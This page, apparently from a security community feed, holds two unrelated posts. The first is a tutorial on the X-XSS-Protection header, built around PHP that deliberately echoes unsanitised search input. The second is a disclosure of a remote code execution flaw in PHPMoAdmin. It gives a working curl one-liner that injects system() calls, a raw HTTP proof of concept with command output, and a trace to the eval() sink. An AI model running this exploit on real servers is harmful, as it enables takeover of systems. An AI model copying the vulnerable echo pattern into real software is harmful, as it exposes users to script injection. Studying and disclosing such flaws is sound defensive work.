Search the Community

In the previous article, we have seen how we can defend against click jacking attacks using the X-Frame-Options header. In this article, we will discuss another header: X-XSS-Protection. Similar to the previous article, we will first see the vulnerable code and then attempt to defend against the attack using this header. Setup is the same as the previous article. Once the user logs in, there will be a little dashboard where the user can search for some values. Below is the code used to implement the functionality. Vulnerable code: <?php session_start(); session_regenerate_id(); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> If you clearly notice in the above code, the application is not sanitizing the user input before it echoes back and thus leaves it vulnerable. Currently, there is no additional protection mechanism implemented to prevent this. We can even have a quick look at HTTP headers. HTTP HEADERS HTTP/1.1 200 OK Date: Sun, 12 Apr 2015 14:53:37 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=f94dc2ac2aa5763c636f9e75365102b5; path=/ Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 So, let us execute some simple JavaScript in the search box and see if it gets executed. Well, it seems the script is not getting executed. Let us inspect the error console and see what’s happening. It is clear from the console that XSS Auditor in Google Chrome is preventing execution of the script. Additionally, it says that it is enabled because there is no X-XSS-Protection or Content-Security-Policy header sent by the server. We can customize this filtering by enabling X-XSS-Protection or Content-Security-Policy headers. Let us first try to disable the protection using the following line. header("X-XSS-Protection: 0"); After adding the above line of code to our page, the page should look as shown below. <?php session_start(); session_regenerate_id(); header("X-XSS-Protection: 0"); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Well! If we now load the page, it pops up an alert box as shown below. Let us also check the same page in Firefox, which pops up an alert box as expected. Now, let us change the value of this header to 1 and try again in the browser. header("X-XSS-Protection: 1"); If you observe the HTTP headers, you can notice that the header has been enabled. HTTP HEADERS: HTTP/1.1 200 OK Date: Sun, 12 Apr 2015 14:54:42 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=8dfb86b13ec9750d1f1afdfc004f5042; path=/ X-XSS-Protection: 1 Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Well, if we now execute the same vulnerable URL, the script won’t be executed. Let us look at the Chrome’s console and see what happened. As we can see in the above console, the script is not executed because of the header we sent. header("X-XSS-Protection: 1"); The above header, when sent with no additional arguments, just stops the script from its execution. We can also add an additional value to this header as shown below. header("X-XSS-Protection: 1; mode=block"); When this header is sent, the browser doesn’t execute the script and shows a blank document to the user as shown below. Below are the headers sent: HTTP/1.1 200 OK Date: Mon, 13 Apr 2015 09:59:22 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=729f2f716310ccfe353c81ced1602cf0; path=/ X-XSS-Protection: 1; mode=block Content-Length: 846 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Though it works fine with popular browsers like Internet Explorer, Chrome and Safari, Firefox doesn’t support this header and still we can see the alert box popping up as shown below. So, this header should be used to have defense in depth in place, but it can’t protect the site completely and thus developers have to make sure they have additional mitigation controls implemented. Source

###################################################################### # _ ___ _ _ ____ ____ _ _____ # | | / _ \| \ | |/ ___|/ ___| / \|_ _| # | | | | | | \| | | _| | / _ \ | | # | |__| |_| | |\ | |_| | |___ / ___ \| | # |_____\___/|_| \_|\____|\____/_/ \_\_| # # PHPMoAdmin Unauthorized Remote Code Execution (0-Day) # Website : http://www.phpmoadmin.com/ # Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio # Release dates : March 3, 2015 # # Special Thanks to 2600 Thailand group # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/ # ######################################################################## [+] Description ============================================================ PHPMoAdmin is a MongoDB administration tool for PHP built on a stripped-down version of the Vork high-performance framework. [+] Exploit ============================================================ Someone was trying to sale this shit for 3000usd lolz $ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit" [+] Proof-of-Concept ============================================================ PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 POST /moadmin/moadmin.php HTTP/1.1 Host: 192.168.33.10 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 34 object=1;system('id;ls -lha');exit HTTP/1.1 200 OK Date: Tue, 03 Mar 2015 16:57:40 GMT Server: Apache/2.4.7 (Ubuntu) Set-Cookie: PHPSESSID=m0ap55aonsj5ueph7hgku0elb1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 223 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html uid=33(www-data) gid=33(www-data) groups=33(www-data) total 116K drwxr-xr-x 1 longcat longcat 102 Mar 3 16:55 . drwxr-xr-x 6 root root 4.0K Mar 3 16:17 .. -rw-rw-r-- 1 longcat longcat 112K Mar 3 16:55 moadmin.php [+] Vulnerability Analysis ============================================================ Filename: moadmin.php 1. create new moadminComponent object 1977: $mo = new moadminComponent; 2. if the http-post parameter 'object' is set 738: class moadminComponent { ... 762: public function __construct() { ... 786: if (isset($_POST['object'])) { 787: if (self::$model->saveObject($_GET['collection'], $_POST['object'])) { ... 3. evaluate the value of 'object' as PHP code 692: public function saveObject($collection, $obj) { 693: eval('$obj=' . $obj . ';'); //cast from string to array Source